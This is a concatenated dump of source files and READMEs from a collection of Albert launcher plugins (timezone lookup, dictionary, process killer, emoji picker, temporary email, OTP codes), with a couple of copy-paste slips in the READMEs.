def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "tz "
def synopsis(self):
return "city/country name"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
# fetch all logos at startup
country_logos_path.mkdir(exist_ok=True)
if not list(country_logos_path.iterdir()):
print("Downloading country logos")
t = time.time()
download_all_logos()
print(f"Downloaded country logos - Took {time.time() - t} seconds")
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
query_str = query.string.strip()
matched = [
elem for elem in process.extract(query_str, full_name_to_city.keys(), limit=8)
]
v0.debug(matched)
unique_cities_matched = get_uniq_elements(
[full_name_to_city[m[0]] for m in matched]
)
# add own timezone:
if local_tz_str in unique_cities_matched:
unique_cities_matched.remove(local_tz_str)
unique_cities_matched.insert(0, local_tz_str)
results.extend([get_as_item(m) for m in unique_cities_matched])
except Exception: # user to report error
print(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep># ipshow - Albert plugin
## Description
Show the IPs of the machine at hand. Pretty much like `ip a s` or `ifconfig`.
## Demo

## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># abbr - Albert plugin
## Description
Lookup words stored in a file along with their description.
This is a, rather esoteric, plugin that looks up and saves pairs of (key, value) in a specified
file on disk.
I use it to lookup items from my personal abbreviations list. You can also add
new items to it by using the `new` keyword
## Demo
|  |  |
## Installation instructions
* Install the fuzzywuzzy python module
For more refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># saxophone - Albert plugin
## Demo




## Description
Current plugin allows you to play internet radio streams without any external
windows or GUIs, directly from Albert. The streams are specified in
`config/saxophone.json` file and using that it's trivial to add more streams.
If the stream contains metadata, they will be displayed via a system
notification on metadata change (e.g., when the song changes).
### Dependencies
I use `mpv` and the [python-mpv c-types
bindings](https://github.com/jaseg/python-mpv) to play the radio stream. For
this to work you have to install `libmpv.so` under your `LD_LIBRARY_PATH` and
make sure that you can `import mpv` from an interactive python interpreter. One
alternative is to install `mpv` via the [mpv-build helper
scripts](https://github.com/mpv-player/mpv-build) with the
`--enable-libmpv-shared` enabled.
Alternatively if you don't want to go through this, you could check out a
previous commit of this repo, e.g., `cf69a7a` where instead of `mpv` python
bindings, I'm using the `cvlc` executable to play the radio streams.
## Demo

## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>"""Words: meaning, synonyms, antonyms, examples."""
import concurrent.futures
import time
import traceback
from pathlib import Path
import albert as v0
from PyDictionary import PyDictionary
md_name = "Words"
md_description = "Words: meaning, synonyms, antonyms, examples"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/words"
md_lib_dependencies = "git+https://github.com/ctoth/PyDictionary@0acf69d"
icon_path = str(Path(__file__).parent / "words")
icon_path_g = str(Path(__file__).parent / "words_g")
icon_path_r = str(Path(__file__).parent / "words_r")
cache_path = Path(v0.cacheLocation()) / "words"
config_path = Path(v0.configLocation()) / "words"
data_path = Path(v0.dataLocation()) / "words"
pd = PyDictionary()
# plugin main functions -----------------------------------------------------------------------
class KeystrokeMonitor:
def __init__(self):
super(KeystrokeMonitor, self)
self.thres = 0.5 # s
self.prev_time = time.time()
self.curr_time = time.time()
def report(self):
self.prev_time = time.time()
self.curr_time = time.time()
self.report = self.report_after_first
def report_after_first(self):
# update prev, curr time
self.prev_time = self.curr_time
self.curr_time = time.time()
def triggered(self) -> bool:
return self.curr_time - self.prev_time > self.thres
def reset(self) -> None:
self.report = self.report_after_first
# I 'm only sending a request to Google once the user has stopped typing, otherwise Google
# blocks my IP.
keys_monitor = KeystrokeMonitor()
# supplementary functions ---------------------------------------------------------------------
def get_items_for_word(query, word: str) -> list:
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
# TODO Do these in parallel
outputs = {}
with concurrent.futures.ThreadPoolExecutor(max_workers=4) as executor:
futures = {
executor.submit(pd.meaning, word): "meanings",
executor.submit(pd.synonym, word): "synonyms",
executor.submit(pd.antonym, word): "antonyms",
}
for future in concurrent.futures.as_completed(futures):
key = futures[future]
try:
outputs[key] = future.result()
except Exception as exc:
print(f"[W] Getting the word {key} generated an exception: {exc}")
meanings = outputs["meanings"]
synonyms = outputs["synonyms"]
antonyms = outputs["antonyms"]
# meaning
items = []
if meanings:
for k, v in meanings.items():
for vi in v:
items.append(
v0.Item(
id=md_name,
icon=[icon_path],
text=vi,
subtext=k,
completion=f"{query.trigger} {word}",
actions=[
ClipAction("Copy", vi),
],
)
)
# synonyms
if synonyms:
items.append(
v0.Item(
id="{md_name}_g",
icon=[icon_path_g],
text="Synonyms",
subtext="|".join(synonyms),
completion=synonyms[0],
actions=[ClipAction(a, a) for a in synonyms],
)
)
# antonym
if antonyms:
items.append(
v0.Item(
id="{md_name}_r",
icon=[icon_path_r],
text="Antonyms",
subtext="|".join(antonyms),
completion=antonyms[0],
actions=[ClipAction(a, a) for a in antonyms],
)
)
return items
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "word "
def synopsis(self):
return "some word e.g., obnoxious"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
query_str = query.string.strip()
# too small request - don't even send it.
if len(query_str) < 2:
keys_monitor.reset()
return
if len(query_str.split()) > 1:
# pydictionary or synonyms.com don't seem to support this
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="A term must be only a single word",
actions=[],
)
)
return
# determine if we can make the request --------------------------------------------
keys_monitor.report()
if keys_monitor.triggered():
results.extend(get_items_for_word(query, query_str))
if not results:
query.add(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="No results.",
actions=[],
),
)
return
else:
query.add(results)
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep># Search Plugin Template for {{ cookiecutter.plugin_name }}
Current plugin was created using
[search_template](https://github.com/bergercookie/awesome-albert-plugins/tree/master/plugins/search_template/%7B%7B%20cookiecutter.plugin_name%20%7D%7D).
It uses [ddgr](https://github.com/jarun/ddgr) under the hoodto offer suggestions /
search results for {{ cookiecutter.plugin_name }} and display them in Albert.
# Installation instructions
Install `ddgr` either from source or from a package. You can find more
instructions [here](https://github.com/jarun/ddgr#installation=).
On Ubuntu 20.04 the following lines should be enough:
```sh
sudo apt install xclip
pip3 install --user --upgrade ddgr
```
Copy this directory to your local Albert plugins directory. By default, that is
under `~/.local/share/albert/org.albert.extension.python/modules`.
<file_sep>#!/usr/bin/env bash
set -x
THIS_DIR=`dirname ${BASH_SOURCE[0]}`/
export LC_ALL=C.UTF-8
export LANG=C.UTF-8
(
cd "$THIS_DIR"
cookiecutter ../cookiecutter/ -o ../plugins/ --no-input
test -d ../plugins/albert_plugin
)
<file_sep>import json
import logging
from concurrent import futures
from pathlib import Path
import requests
logger = logging.getLogger("__file__")
def check_link(link: str) -> int:
headers = {}
req = requests.head(link, headers=headers, timeout=1)
return req
def test_links():
json_file = Path(__file__).absolute().parent.parent / "config" / "saxophone.json"
with open(json_file, "r") as f:
conts = json.load(f)
links = []
for stream in conts["all"]:
links.extend([val for key, val in stream.items() if key in ("url", "homepage")])
with futures.ThreadPoolExecutor(max_workers=10) as executor:
fs = {executor.submit(check_link, link): link for link in links}
for f in futures.as_completed(fs):
link = fs[f]
logger.debug(f"Checking link - {link}")
# Cannot get HEAD from RadioParadise links - that's OK for now.
assert f.result().ok or f.result().status_code == 400, f"Invalid link detected - {link}"
logger.debug(f"OK - {link}")
<file_sep># harakiri - Albert plugin
## Description
Create a temporary email at [harakirimail.com](https://harakirimail.com/). By
defaults opens it in the browserand also copies the generated email address
to the clipboard
## Demo
|  |  |
## Installation instructions
On Linux install `xclip`:
For more info refer to the parent project: [Awesome albert
plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>"""Kill a process v2."""
import fnmatch
import re
import signal
import traceback
from pathlib import Path
from typing import Dict, List
import psutil
from fuzzywuzzy import process
from gi.repository import GdkPixbuf, Notify
from psutil import Process
import albert as v0
md_name = "Kill Process v2"
md_description = "Terminate/Kill a process - find it using fuzzy expressions ..."
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/killproc"
icon_path = str(Path(__file__).parent / "logo.png")
cache_path = Path(v0.cacheLocation()) / "killproc"
config_path = Path(v0.configLocation()) / "killproc"
data_path = Path(v0.dataLocation()) / "killproc"
# supplementary functions ---------------------------------------------------------------------
def notify(
msg: str,
app_name: str = md_name,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def cmdline(p: Process) -> str:
"""There must be a bug in psutil and sometimes `cmdline()` raises an exception. I don't
want that, so I'll override this behavior for now.
"""
try:
return " ".join(p.cmdline())
except psutil.NoSuchProcess:
return ""
def procs() -> List[Process]:
"""Get a list of all the processes."""
return list(psutil.process_iter())
def globsearch_procs(s: str) -> List[Process]:
"""Return a list of processes whose command line matches the given glob."""
pat = re.compile(fnmatch.translate(s))
procs_ = procs()
procs_out = list(filter(lambda p: re.search(pat, cmdline(p)) is not None, procs_))
notify(msg=f"Glob search returned {len(procs_out)} matching processes")
return procs_out
def get_cmdline_to_procs() -> Dict[str, List[Process]]:
"""Return a Dictionary of command-line args string to all the corresponding processes with
that."""
procs_ = procs()
out = {cmdline(p): [] for p in procs_}
for p in procs_:
out[cmdline(p)].append(p)
return out
def kill_by_name(name: str, signal=signal.SIGTERM):
"""Kill all the processes whose name matches the given one."""
procs_ = procs()
for p in filter(lambda p: p.name() == name, procs_):
p.send_signal(signal)
def get_as_item(query, p: Process, *extra_actions):
"""Return an item - ready to be appended to the items list and be rendered by Albert.
if Process is not a valid object (.name or .cmdline raise an exception) then return None
"""
name_field = cmdline(p)
if not name_field:
return None
try:
actions = [
FuncAction("Terminate", lambda: p.terminate()),
FuncAction("Kill", lambda: p.kill()),
ClipAction("Get PID", f"{p.pid}"),
FuncAction(
"Terminate matching names",
lambda name=p.name(): kill_by_name(name, signal=signal.SIGTERM),
),
FuncAction("Kill matching names", lambda name=p.name(): kill_by_name(name)),
]
actions = [*extra_actions, *actions]
return v0.Item(
id=md_name,
icon=[icon_path],
text=name_field,
subtext="",
completion=f"{query.trigger}{p.name()}",
actions=actions,
)
except psutil.NoSuchProcess:
return None
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "kill "
def synopsis(self):
return "process ID/name"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*."""
try:
query_str = query.string.strip()
cmdline_to_procs = get_cmdline_to_procs()
matched = [
elem[0]
for elem in process.extract(query_str, cmdline_to_procs.keys(), limit=15)
]
extra_actions = []
if any([symbol in query_str for symbol in "*?[]"]):
extra_actions = [
FuncAction(
"Terminate by glob",
lambda: list(
map(lambda p: p.terminate(), globsearch_procs(query_str))
),
),
FuncAction(
"Kill by glob",
lambda: list(map(lambda p: p.kill(), globsearch_procs(query_str))),
),
]
query.add(
[
res
for m in matched
for p in cmdline_to_procs[m]
if (res := get_as_item(query, p, *extra_actions)) is not None
]
)
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep>"""Emoji picker."""
import subprocess
import traceback
from pathlib import Path
from albert import *
import em
from fuzzywuzzy import process
import pickle
md_iid = "0.5"
md_version = "0.2"
md_name = "Emoji picker"
md_description = "Lookup and copy various emojis to your clipboard"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/emoji"
md_maintainers = "<NAME>"
md_bin_dependencies = ["xclip"]
md_lib_dependencies = ["em", "fuzzywuzzy"]
# Let Exceptions fly
if "parse_emojis" not in dir(em):
raise RuntimeError(
"Was able to import the em module but no parse_emojis method in it. "
"Are you sure you have pip-installed the em-keyboard module and not the empy module?"
)
class Plugin(QueryHandler):
def id(self):
return __name__
def name(self):
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "em "
def synopsis(self):
return "<emoji name>"
def initialize(self):
self.parse_emojis()
self.icon_path = [str(Path(__file__).parent / "emoji.png")]
self.cache_path = Path(cacheLocation()) / "emoji"
self.config_path = Path(configLocation()) / "emoji"
self.data_path = Path(dataLocation()) / "emoji"
self.stats_path = self.config_path / "stats"
# create plugin locations
for p in (self.cache_path, self.config_path, self.data_path):
p.mkdir(parents=False, exist_ok=True)
if not self.stats_path.exists():
with self.stats_path.open("wb") as f:
pickle.dump({}, f)
def parse_emojis(self):
self.emojis = em.parse_emojis()
self.emojis_li = list(self.emojis.items())
# example:
# label: 'folded_hands'
# emoji_tuple: ('🙏', ['folded_hands', 'please', 'hope', 'wish', 'namaste', 'highfive', 'pray'])
self.label_to_emoji_tuple = {}
for emoji_tuple in self.emojis.items():
label_list = emoji_tuple[1]
for label in label_list:
self.label_to_emoji_tuple[label] = emoji_tuple
# debug(f"label_to_emoji_tuple: {self.label_to_emoji_tuple}")
def update_emojis(self):
prev_len = len(self.emojis_li)
self.parse_emojis()
curr_len = len(self.emojis_li)
if curr_len == prev_len:
self.notify(msg=f"Found no new emojis - Total emojis count: {curr_len}")
else:
diff = curr_len - prev_len
self.notify(
msg=f'Found {diff} {"more" if diff > 0 else "less"} emojis - Total emojis count: {curr_len}'
)
def get_stats(self):
with self.stats_path.open("rb") as f:
return pickle.load(f)
def update_stats(self, emoji: str):
stats = self.get_stats()
if emoji in stats:
stats[emoji] += 1
else:
stats[emoji] = 1
with self.stats_path.open("wb") as f:
pickle.dump(stats, f)
def copy_emoji(self, emoji: str):
self.update_stats(emoji)
subprocess.run(f"echo {emoji} | xclip -r -selection clipboard", shell=True)
def handleQuery(self, query):
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
query_str = query.string.strip()
if query_str == "":
results.append(self.get_reindex_item())
recent = [
k
for k, _ in sorted(
self.get_stats().items(), key=lambda item: item[1], reverse=True
)[:10]
]
results.extend(
[self.get_emoji_as_item((emoji, self.emojis[emoji])) for emoji in recent]
)
if len(results) < 30:
results.extend(
self.get_emoji_as_item(emoji_tuple)
for emoji_tuple in self.emojis_li[: 30 - len(results)]
)
else:
matched = process.extract(
query_str, list(self.label_to_emoji_tuple.keys()), limit=30
)
matched_emojis = list(
dict([self.label_to_emoji_tuple[label] for label, *_ in matched]).items()
)
results.extend(
[self.get_emoji_as_item(emoji_tuple) for emoji_tuple in matched_emojis]
)
except Exception: # user to report error
critical(traceback.format_exc())
results.insert(
0,
Item(
id=md_name,
icon=self.icon_path,
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
Action(
"copy_error",
f"Copy error - report it to {md_url[8:]}",
lambda t=traceback.format_exc(): setClipboardText(t),
)
],
),
)
query.add(results)
def notify(self, msg: str, app_name: str = md_name):
sendTrayNotification(title=app_name, msg=msg, ms=2000)
def get_reindex_item(self):
return self.get_as_item(
text="Re-index list of emojis",
actions=[Action("reindex", "Re-index list of emojis", self.update_emojis)],
)
def get_as_item(
self, *, text: str, actions: list, subtext: str = None, completion: str = None
):
if subtext is None:
subtext = text
if completion is None:
completion = f"{self.defaultTrigger()}{text}"
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
return Item(
id=md_name,
icon=self.icon_path,
text=text,
subtext=subtext,
completion=completion,
actions=actions,
)
def get_emoji_as_item(self, emoji_tuple: tuple):
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
emoji = emoji_tuple[0]
labels = [label.replace("_", " ") for label in emoji_tuple[1]]
main_label = labels[0]
text = f"{emoji} {main_label}"
subtext = " | ".join(labels[1:])
return Item(
id=md_name,
icon=self.icon_path,
text=text,
subtext=subtext,
completion=f"{self.defaultTrigger()}{main_label}",
actions=[
Action("copy", f"Copy this emoji", lambda emoji=emoji: self.copy_emoji(emoji)),
Action(
"google",
f"Google this emoji",
lambda u=f"https://www.google.com/search?q={main_label} emoji": openUrl(u),
),
],
)
def save_data(self, data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(self.config_path / data_name, "w") as f:
f.write(data)
def load_data(self, data_name: str) -> str:
"""Load a piece of data from the configuration directory."""
with open(self.config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
<file_sep># clock - Albert plugin
## Description
Create stopwatches and countdown objects that will measure how much time you
spend in tasks and notify you when the designated time is up.
## Demo

## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># Google Translate - Albert plugin
## Description
Translate to and from all the languages that Google translate supports
### Dependencies
I use `mpv` and the [python-mpv c-types
bindings](https://github.com/jaseg/python-mpv) to play the radio stream. For
this to work you have to install `libmpv.so` under your `LD_LIBRARY_PATH` and
make sure that you can `import mpv` from an interactive python interpreter. One
alternative is to install `mpv` via the [mpv-build helper
scripts](https://github.com/mpv-player/mpv-build) with the
`--enable-libmpv-shared` enabled.
Alternatively if you don't want to go through this, you could check out a
previous commit of this repo, e.g., `cf69a7a` where instead of `mpv` python
bindings, I'm using the `cvlc` executable to play the radio streams.
## Demo

## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># meme-generator - Albert plugin
## Description
Generate memes from a variety of image selection and add your custom text.
Then, copy it to your clipboard, or save it to disk.
Optionally you can add effects to the meme, e.g., shaking.
The meme generation runs offline, there's no need to be connected to the internet.
## Demo

## Installation instructions
* Install [meme](https://github.com/nomad-software/meme) directly from github.
You'll need a relatively recent version of `go` for this. You could use
[gvm](https://github.com/moovweb/gvm) if that's not supported by your package
manager.
* Install [xclip](https://linux.die.net/man/1/xclip)
Refer to the parent project for more: [Awesome albert
plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on
Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interesting
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
<file_sep>"""Harakiri mail temporary email."""
import random
import string
import subprocess
import traceback
import webbrowser
from pathlib import Path
import albert as v0
md_name = "Harakiri"
md_description = "Harakiri mail - access a temporary email address"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/harakiri"
icon_path = str(Path(__file__).parent / "harakiri")
cache_path = Path(v0.cacheLocation()) / "harakiri"
config_path = Path(v0.configLocation()) / "harakiri"
data_path = Path(v0.dataLocation()) / "harakiri"
def randstr(strnum=15) -> str:
return "".join(
random.SystemRandom().choice(
string.ascii_lowercase + string.ascii_uppercase + string.digits
)
for _ in range(strnum)
)
# supplementary functions ---------------------------------------------------------------------
def copy_and_go(email: str):
url = f"https://harakirimail.com/inbox/{email}"
subprocess.Popen(f"echo {<EMAIL> | xclip -selection clipboard", shell=True)
webbrowser.open(url)
def get_as_item(query, email):
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
return v0.Item(
id=md_name,
icon=[icon_path],
text=f"Temporary email: {email}",
subtext="",
completion=f"{query.trigger} {email}",
actions=[
FuncAction(
"Open in browser (and copy email address)",
lambda email=email: copy_and_go(email),
),
],
)
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "harakiri "
def synopsis(self):
return "email address to spawn"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
try:
query_str = query.string.strip()
query.add(get_as_item(query, query_str if query_str else randstr()))
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep># {{ cookiecutter.plugin_name }} - Albert plugin
## TODO Plugin is not ready yet - README info may be inaccurate
## TODO - Add demo gif/pictures
## Description
## Demo
|  |  |
## Installation instructions
Refer to the parent project: [Awesome albert plugins]({{ cookiecutter.parent_repo_url }})
## Self Promotion
If you find this tool useful, please [star it on Github]({{ cookiecutter.parent_repo_url }})
## TODO List
See [ISSUES list]({{ cookiecutter.parent_repo_url }}/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>"""2FA codes using otp-cli and pass."""
import os
import subprocess
import traceback
from pathlib import Path
import albert as v0
import gi
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip # type: ignore
md_name = "OTP/2FA Codes"
md_description = "Fetch OTP codes using otp-cli and pass"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/pass_totp_cli"
)
md_bin_dependencies = ["pass", "totp"]
icon_path = str(Path(__file__).parent / "pass_totp_cli")
cache_path = Path(v0.cacheLocation()) / "pass_totp_cli"
config_path = Path(v0.configLocation()) / "pass_totp_cli"
data_path = Path(v0.dataLocation()) / "pass_totp_cli"
pass_dir = Path(
os.environ.get(
"PASSWORD_STORE_DIR", os.path.join(os.path.expanduser("~/.password-store/"))
)
)
pass_2fa_dir = pass_dir / "2fa"
def do_notify(msg: str, image=None):
app_name = "pass_topt_cli"
Notify.init(app_name)
image = image
n = Notify.Notification.new(app_name, msg, image)
n.show()
# supplementary functions ---------------------------------------------------------------------
def totp_show(name: str) -> str:
try:
return subprocess.check_output(["totp", "show", name]).decode("utf-8")
except Exception:
exc = f"Exception:\n\n{traceback.format_exc()}"
v0.critical(exc)
do_notify(f"Couldn't fetch the OTP code. {exc}")
return ""
def get_as_item(path: Path):
name = str(path.relative_to(pass_2fa_dir).parent)
return v0.Item(
id=md_name,
icon=[icon_path],
text=name,
completion="",
actions=[
FuncAction(
"Copy 2FA code",
lambda name=name: totp_show(name=name).strip(),
)
],
)
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "totp "
def synopsis(self):
return ""
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
results = []
try:
for path in pass_2fa_dir.glob("**/*.gpg"):
results.append(get_as_item(path))
except Exception: # user to report error
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep># Albert Python Plugins Bootstrapping
Purpose of this repository is to facilitate the bootstrapping of other Albert
plugins. For that it makes use of
